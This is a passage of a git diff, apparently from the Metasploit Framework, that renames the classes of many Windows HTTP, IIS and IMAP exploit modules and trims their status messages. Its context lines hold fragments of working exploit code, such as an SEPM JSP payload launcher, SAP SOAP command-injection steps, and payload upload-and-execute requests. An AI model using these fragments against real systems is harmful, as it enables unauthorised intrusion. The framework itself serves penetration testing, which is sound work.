MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/rabidhamster_r4_log.rb b/modules/exploits/windows/http/rabidhamster_r4_log.rb index d63fe48e99..a4a1a1f186 100644 --- a/modules/exploits/windows/http/rabidhamster_r4_log.rb +++ b/modules/exploits/windows/http/rabidhamster_r4_log.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 7c24bcaf8f..cce2a993c1 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, req) - print_status("#{peer} - Payload request received: #{req.uri}") + print_status("Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index e4b0a0e1ed..060403088e 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 0ef0bb0f34..1b37036b59 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class MetasploitModule < Msf::Exploit Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index ee531318fd..3ba0407e99 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient @@ -381,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Testing command injection...") + print_status("Testing command injection...") res = send_request_cgi({ 'uri' => '/', @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Injecting system commands...") + print_status("Injecting system commands...") res = send_request_cgi({ 'uri' => '/', @@ -466,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.code == 500 and res.body =~ /Generic error/) - print_good("#{peer} - System command successfully injected") + print_good("System command successfully injected") else - print_error("#{peer} - Failed to inject system command") + print_error("Failed to inject system command") return end @@ -505,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Executing injected command") + print_status("Executing injected command") res = send_request_cgi({ 'uri' => '/', @@ -518,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 1) if res - print_error("#{peer} - Failed to execute injected command") + print_error("Failed to execute injected command") return end diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 67ed566e16..7456fd6022 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] } diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index bf44556edd..e21b096884 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] } diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index a61073ba6b..49b4f3ed2b 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -63,7 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), @@ -89,7 +89,7 @@ class Metasploit4 < Msf::Exploit::Remote <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -110,7 +110,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") - print_status("#{peer} - Uploading JSP page to execute the payload...") + print_status("Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -131,7 +131,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") - print_status("#{peer} - Executing payload. Manual cleanup will be required.") + print_status("Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index c4a78a8faa..5384e6cef6 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index aeb11ebc39..b95de3b057 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index f3dbbe7725..5255a61775 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb index 5ba781def4..f484664718 100644 --- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb +++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index ff35263e44..2df31f7ccf 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 5bd2bfab84..053b40eec4 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote php_fname = Rex::Text.rand_text_alpha(5) + ".php" rnd_txt = Rex::Text.rand_text_alpha_upper(3) - print_status("#{peer} - Sending SQL injection...") + print_status("Sending SQL injection...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', @@ -88,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body !~ /No Results Found/ - print_error("#{peer} - I don't think the SQL Injection attempt worked") + print_error("I don't think the SQL Injection attempt worked") return elsif not res - print_error("#{peer} - No response from the server") + print_error("No response from the server") return end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status(res.to_s) target_path = "#{File.dirname(target_uri.path)}/#{php_fname}" - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 930a01332d..650dd5f3e5 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb index e8bfdbb437..c84081854b 100644 --- a/modules/exploits/windows/http/sws_connection_bof.rb +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index e25b6b7075..8be77137c6 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index d770ad3532..b043198646 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 627868613f..f431fd9289 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index da07199b52..c4cc9ee2fd 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -499,7 +499,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' @@ -507,7 +507,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 500 - print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) + print_error("Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) # try again but now use ASPX instead of ASP or vice-versa if @version == 9 file_content = Msf::Util::EXE.to_exe_aspx(exe) @@ -521,7 +521,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index c9482fdcf8..0b1dcff49f 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ultraminihttp_bof.rb b/modules/exploits/windows/http/ultraminihttp_bof.rb index ac5841b53a..1100d1b113 100644 --- a/modules/exploits/windows/http/ultraminihttp_bof.rb +++ b/modules/exploits/windows/http/ultraminihttp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 490f35f88d..8cb9460f71 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote begin aspx = @upload_random + '.aspx' - print_status("#{peer} - Searching: #{aspx}") + print_status("Searching: #{aspx}") files = cli.fs.file.search("\\", aspx) if not files or files.empty? print_error("Unable to find #{aspx}. Please manually remove it.") @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{aspx} deleted") + print_good("#{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end @@ -121,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote # attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx") + print_status("Uploading #{aspx.length} bytes through #{attack_url}...") + print_status("Uploading to #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, @@ -135,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") + print_status("Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") end # @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # upload_path = uri_path + "#{@upload_random}.aspx" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -155,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code > 302) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -183,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx") + print_status("Writing #{aspx.length} bytes through #{attack_url}...") + print_status("Wrting over #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, @@ -197,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") + print_status("Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") end handler end diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 2466bffdee..e6e1375362 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } @@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote end if cli.type != 'meterpreter' - print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}") + print_error("Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("#{peer} - Searching: #{@dropper}") + print_status("Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? - print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.") + print_error("Unable to find #{@dropper}. Please manually remove it.") return end @@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{@dropper} deleted") + print_good("#{@dropper} deleted") return rescue ::Exception => e - print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}") + print_error("Unable to delete #{@dropper}: #{e.message}") end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 0cec534547..5821ba4e27 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 744519e2fd..c39180bfa0 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index bcb6a05fc3..213f3d1b68 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb index f0623ef54a..a650c6cbbe 100644 --- a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 3a4eecf03c..4e0e67c8e7 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 60c0e47956..74f593f2ad 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index b425fd66f9..1318d6ac68 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index b4f2dd6579..5a4738e926 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 284ef19b3a..f631cc4e19 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index c58d7acfc6..017b790caa 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 3e201893f9..8b8b9ea12e 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 1b8c895093..d548309299 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" + "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n" - if datastore['InvalidSearchRequest'] == true + if datastore['InvalidSearchRequest'] xml = rand_text(rand(1024) + 32) end diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index de5f2e17b7..fff453f738 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index c5f04e6144..035aa5a85f 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index de067d9294..77a2823617 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index f658c6baa2..403dadfdbf 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 25987fbebe..776059c1bb 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index d67fcf75c2..9e984b8f5e 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -5,7 +5,7 @@ require 